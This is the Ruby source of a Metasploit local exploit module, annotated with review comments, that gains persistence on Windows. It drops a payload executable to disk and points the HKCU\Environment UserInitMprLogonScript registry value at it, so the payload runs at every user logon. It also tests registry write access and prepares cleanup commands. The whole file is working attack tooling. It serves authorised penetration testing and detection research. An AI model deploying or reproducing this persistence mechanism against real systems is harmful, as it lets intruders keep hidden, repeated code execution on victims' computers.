##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local persistence module: drops a payload executable into the session's
# writable directory and sets HKCU\Environment\UserInitMprLogonScript to its
# path. Artifacts left on the host are the registry value and the file on
# disk (both declared under 'SideEffects'); @clean_up_rc records how to undo
# them.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # @param info [Hash] info hash passed in by the framework and merged via
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Persistence via UserInitMprLogonScript',
        'Description' => %q{
          This module establishes persistence by setting the UserInitMprLogonScript
          value in HKCU\Environment. During user logon, userinit.exe checks this value
          and executes the specified command or binary.

          The module writes a payload executable to disk and points
          UserInitMprLogonScript to that payload.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Nayera'],
        'Platform' => [ 'win' ],
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-07-01',
        'Notes' => {
          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )

    # PAYLOAD_NAME is optional; install_persistence falls back to a random
    # alphabetic name when it is not set.
    register_options([
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.'])
    ])
  end

  # Registry key that holds the UserInitMprLogonScript value; used by both
  # #check and #install_persistence.
  #
  # @return [String] 'HKCU\Environment'
  def regkey
    'HKCU\\Environment'
  end

  # Probes whether persistence can be installed from this session: the
  # writable directory must exist and a scratch value must be writable under
  # #regkey.
  #
  # @return [CheckCode] Safe with a reason when either precondition fails,
  #   Vulnerable otherwise
  def check
    # The module's own caveat: a payload under %TEMP% only lasts until reboot.
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%')

    return CheckCode::Safe("#{writable_dir} does not exist") unless exists?(writable_dir)

    # Write probe: set a random scratch value and remove it again. The result
    # of the delete is not checked, so a failed delete would leave the scratch
    # value behind in the key.
    test_name = Rex::Text.rand_text_alpha(8)
    test_value = Rex::Text.rand_text_alpha(8)
    return CheckCode::Safe("Unable to write to registry path #{regkey}") unless registry_setvaldata(regkey, test_name, test_value, 'REG_SZ')

    registry_deleteval(regkey, test_name)

    CheckCode::Vulnerable('Registry path is writable')
  end

  # Writes the payload executable and points UserInitMprLogonScript at it,
  # then records a cleanup resource script in @clean_up_rc (presumably
  # consumed by the Persistence mixin — confirm against the mixin).
  #
  # @raise via fail_with(Failure::UnexpectedReply) when the payload file
  #   cannot be written
  def install_persistence
    # Operator-supplied name, else a random 6..13 character alphabetic name.
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
    payload_exe = generate_payload_exe
    # Backslash-separated path; it is stored verbatim as the registry value
    # data and, with separators flipped to '/', used by the cleanup rm below.
    payload_pathname = "#{writable_dir}\\#{payload_name}.exe"

    vprint_good("Writing payload to #{payload_pathname}")
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)

    # Capture the previous value (nil when absent) so cleanup can restore it.
    old_value = registry_getvaldata(regkey, 'UserInitMprLogonScript')
    # NOTE(review): the return value of registry_setvaldata is not checked
    # here, so a failed write is still reported as success by print_good.
    registry_setvaldata(regkey, 'UserInitMprLogonScript', payload_pathname, 'REG_SZ')
    print_good("Configured #{regkey}\\UserInitMprLogonScript to execute #{payload_pathname}")

    # Cleanup script: delete the value if none existed before; otherwise
    # restore the old value via cmd.exe's reg add, with backslashes doubled
    # so they survive the quoting of that command line.
    if old_value.nil?
      @clean_up_rc = "reg deleteval -k '#{regkey}' -v 'UserInitMprLogonScript'\n"
    else
      escaped_old_value = old_value.gsub('\\', '\\\\')
      @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v UserInitMprLogonScript /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
    end
    # Finally remove the dropped payload file (path given with '/' separators).
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
  end
end